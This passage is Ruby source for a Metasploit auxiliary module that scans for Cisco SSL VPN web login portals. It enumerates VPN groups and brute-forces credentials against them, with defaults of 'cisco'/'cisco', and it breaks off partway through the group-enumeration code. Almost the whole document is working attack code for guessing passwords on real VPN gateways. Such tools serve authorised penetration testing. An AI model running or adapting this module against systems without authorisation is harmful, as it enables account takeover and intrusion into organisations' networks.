## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, 'Name' => 'Cisco SSL VPN Bruteforce Login Utility', 'Description' => %{ This module scans for Cisco SSL VPN web login portals and performs login brute force to identify valid credentials. }, 'Author' => [ 'Jonathan Claudius ', ], 'License' => MSF_LICENSE )) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]), OptString.new('USERNAME', [true, "A specific username to authenticate as", 'cisco']), OptString.new('PASSWORD', [true, "A specific password to authenticate with", 'cisco']), OptString.new('GROUP', [false, "A specific VPN group to use", '']) ], self.class) end def run_host(ip) unless check_conn? print_error("#{peer} - Connection failed, Aborting...") return end unless is_app_ssl_vpn? print_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") return end print_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") groups = Set.new if datastore['GROUP'].empty? print_status("#{peer} - Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups if groups.empty? print_good("#{peer} - Unable to enumerate groups") print_good("#{peer} - Using the default group: DefaultWEBVPNGroup") groups << "DefaultWEBVPNGroup" else print_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") end else groups << datastore['GROUP'] end groups << "" print_status("#{peer} - Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| do_login(user, pass, group) end end end # Verify whether the connection is working or not def check_conn? begin res = send_request_cgi( { 'uri' => '/', 'method' => 'GET' }) print_good("#{peer} - Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE return end end def enumerate_vpn_groups res = send_request_cgi({ 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', }) if res && res.code == 302 res = send_request_cgi({ 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', 'method' => 'GET', }) end groups = Set.new group_name_regex = /